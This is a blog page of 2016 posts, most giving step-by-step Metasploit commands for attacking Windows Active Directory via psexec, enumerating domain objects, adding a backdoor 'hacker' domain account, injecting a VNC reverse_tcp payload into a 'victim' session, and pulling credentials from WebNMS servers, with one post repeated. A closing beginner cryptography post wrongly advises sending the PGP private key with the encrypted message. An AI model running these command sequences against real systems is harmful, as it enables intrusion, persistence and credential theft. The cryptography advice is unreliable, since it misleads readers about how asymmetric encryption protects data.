Penetration Testing in Windows Server Active Directory using Metasploit (Part 1)

at 5:40 AM Saturday, July 23, 2016 0 comments
Open Kali terminal type nmap -sV 192.168.0.104


you'll see that port 445 is open, port 445 is a traditional Microsoft networking port. Specifically, TCP port 445 runs Server Message Block(SMB) over TCP/IP. This is a core means for communication on a Microsoft-based LAN.


In Kali terminal type msfconsole

This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the "psexec" utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost 192.168.0.104
msf exploit(psexec) > set rport 445
msf exploit(psexec) > set smbuser administrator
msf exploit(psexec) > set smbpass Ignite@123
msf exploit(psexec) > exploit


Find All Active Directory users

This module will enumerate computers included in the primary Domain
msf > use post/windows/gather/enum_ad_computers
msf post(enum_ad_computers) > set filter objectCategory=computer
msf post(enum_ad_computers) > set session 1
msf post(enum_ad_computers) > exploit


Find All Share Folder in Active Directory
This module will enumerate configured and recently used file shares.
msf > post/windows/gather/enum_shares
msf post(enum_shares) > set session 1
msf post(enum_shares) > exploit


Gather All Groups in Active Directory

This module will enumerate Active Directory groups on the specified domain.
msf > use post/windows/gather/enum_ad_groups
msf post(enum_ad_groups) > set session 1
msf post(enum_ad_groups) > exploit


To  Add Any User in Active Directory

This module adds a user to the Domain and/or to a Domain group. It will check if sufficient privileges are present for certain actions and run getprivs for system. If you elevated privs to system,the Se Assign Primary Token Privilege will not be assigned. You need to migrate to a process that is running as system. If you don't have privs, this script exits.

msf > use post/windows/manage/add_user_domain
msf post(add_user_domain) > set addtodomain true
msf post(add_user_domain) > set username hacker
msf post(add_user_domain) > set password abcd@123
msf post(add_user_domain) > set session 1
msf post(add_user_domain) > exploit



To  Delete Any  User from Active Directory

This module deletes a local user account from the specified server, or the local machine if no server is given.

msf > use post/windows/manage/delete_user
msf post(delete_user) > set username hacker
msf post(delete_user) > set session 1
msf post(delete_user) > exploit


Labels: ,

Capture VNC Session of Remote Windows PC by Payloads Injection

at 5:46 AM Friday, July 22, 2016 0 comments
This article contains post exploitation method. To run following commands successfully first take a session of meterpreter and then follow the commands

In this digital era, more and more people are becoming aware of security and the all the companies take the responsibility to increase their security. Hence, technology is being upgraded every single second. Therefore, it is becoming difficult to hack the modern technology. But where there is will; there is a way.

We all know that every problem comes with a solution, and so is our following problem:

While taking control over our victim’s  PC, often due to security measures  some of our commands does not work such as run vnc and so, we might come across such error:


In such case, there is a special payload especially for vnc. Whenever you face such problem use following exploit:

 Now type use windows/manage/payload_inject
msf exploit (payload_inject)>set payload windows/vncinject/reverse_tcp
msf exploit (payload_inject)>set lhost 192.168.0.18
msf exploit (payload_inject)>set session 1
msf exploit (payload_inject)>set handler true
msf exploit (payload_inject)>exploit           


After executing you can see the following result:

Labels: ,

Gather Credential of WebNMS Framework Server using Metasploit

at 9:16 AM Thursday, July 21, 2016 0 comments
This module abuses two vulnerabilities in WebNMS Framework Server 5.2 to extract all user credentials. The first vulnerability is a unauthenticated file download in the FetchFile servlet, which is used to download the file containing the user credentials. The second vulnerability is that the the passwords in the file are obfuscated with a very weak algorithm which can be easily reversed. This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on Windows and Linux.

Exploit Targets
WebNMS Framework Server 5.2

Requirement
Attacker: kali Linux
Victim PC: WebNMS Framework Server 5.2


Open Kali terminal type msfconsole


Now type use auxiliary/admin/http/webnms_cred_disclosure
msf exploit (webnms_cred_disclosure)>set rhost 192.168.0.103 (IP of Remote Host)
msf exploit (webnms_cred_disclosure)>set rport 9090
msf exploit (webnms_cred_disclosure)>exploit           

Labels: ,

Gather Credential of WebNMS Framework Server using Metasploit

at 9:13 AM 0 comments
This module abuses two vulnerabilities in WebNMS Framework Server 5.2 to extract all user credentials. The first vulnerability is a unauthenticated file download in the FetchFile servlet, which is used to download the file containing the user credentials. The second vulnerability is that the the passwords in the file are obfuscated with a very weak algorithm which can be easily reversed. This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on Windows and Linux.

Exploit Targets
WebNMS Framework Server 5.2

Requirement
Attacker: kali Linux
Victim PC: WebNMS Framework Server 5.2


Open Kali terminal type msfconsole


Now type use auxiliary/admin/http/webnms_cred_disclosure
msf exploit (webnms_cred_disclosure)>set rhost 192.168.0.103 (IP of Remote Host)
msf exploit (webnms_cred_disclosure)>set rport 9090
msf exploit (webnms_cred_disclosure)>exploit           

Labels: ,

Beginner Guide of Cryptography (Part 1)

at 10:21 AM Wednesday, July 20, 2016 0 comments
Cryptography is conversion of plain readable text into unreadable form. In cryptography first the data is coverted into cipher text (that is encryption) and then the cipher text is coverted back into readable form (that is decryption). Cryptography basically works on the concept of encryption and decryption. Encryption and decryption should not be confused with encoding and decoding, in which data is converted from one form to another but is not deliberately altered so as to conceal its content. Encryption is achieved through the algorythms. These algorythms are works with logic, mathematic calculations and its complexities.
Encryption : Encrypted data is refered to cipher text. Cipher text is conversion of readable text into undreadable form. It is the most effective way to achieve data security. To read an encrypted file, you must have access to a secret key or password that enables you to decrypt it. 
Decryption : Decryption is the process of converting encrypted data back into its original form, so it can be understood. To decrypt the data one needs a secret key or password so it can be decrypted.
Encryption can be done through three ways:

1. Symmetric
2. Asymmetric
3. Hash

Symmetric :Symmetric encryption’s job is to take readable data, scramble it to make it unreadable, then unscramble it again when it’s needed. It’s generally fast, and there are lots of good encryption methods to choose from.  The most important thing to remember about symmetric encryption is that both sides—the encrypter, and the decrypter—need access to the same key.

Asymmetric :Asymmetric encryption also takes readable data, scrambles it, and unscrambles it again at the other end, but there’s a twist : a different key is used for each end.  Encrypters use a public key to scramble the data, and decrypters use the matching private (secret) key on the other end to unscramble it again.

Hash :Hashing is what is actually happening when you hear about passwords being “encrypted”.  Strictly speaking, hashing is not a form of encryption, though it does use cryptography.  Hashing takes data and creates a hash out of it, a string of data with three important properties : the same data will always produce the same hash, it’s impossible to reverse it back to the original data, given knowledge of only the hash, it’s infeasible to create another string of data that will create the same hash (called a “collision” in crypto parlance). hash is to authenticate otherwise clearly-transmitted data using a shared secret (effectively, a key.) The hash is generated from the data and this secret, so that only the data and the hash are visible; the shared secret is not transmitted and it thus becomes infeasible to modify either the data or the hash without such modification being detected.
Now, there are very simple methods to achieve cryptography in our day to day life so that our data sharing can be done securely.


For Symmetric encyption we can simply visit the website : www.aesencryption.net , shown below : 


On this is website in first box writing your message and in second box give your password and then click on encrypt button on the right side.


The website will now reload itself and will provide you the encrypted text. Send this encrypted text to the desired person and tell them the key (which, in this case, is time).

The said person, after receiving your encrypted message, can come on this website to decrypt it. He/She wil simple have to copy the encrypted text and paste it on the first box and enter the key in next box and click on decrypt button on the right side as shown below :


After clicking on decrypt the site will reload itself and will provide you with plain text.


Hence, symetric encryption.
For Asymmetric encryption, we can simply go to www.igolder.com/pgp/generate-key/ , the following website wil open:


Click on generate PGP keys, after opening the website. A public and private key will be generated.


Now, copy the public key and click on PGP encrypt message option, it will redirect to the following page


Paste the public key in the first box and write your message in the second box. By clicking on Encrypt Message, you will get your message ecrypted.


Now, copy this encrypted message to the desired person along with the private key which you generated in the first step. The same person can also visited this site and click on PGP decrypt message option to decrypt the message. After clicking on the said option, the following page will open:


He/She can copy the private key and ecrypted message and paste it on first and second box respectively.


At last click on Decrypt message and your message will be decrypted.

Labels:
Subscribe to: Posts (Atom)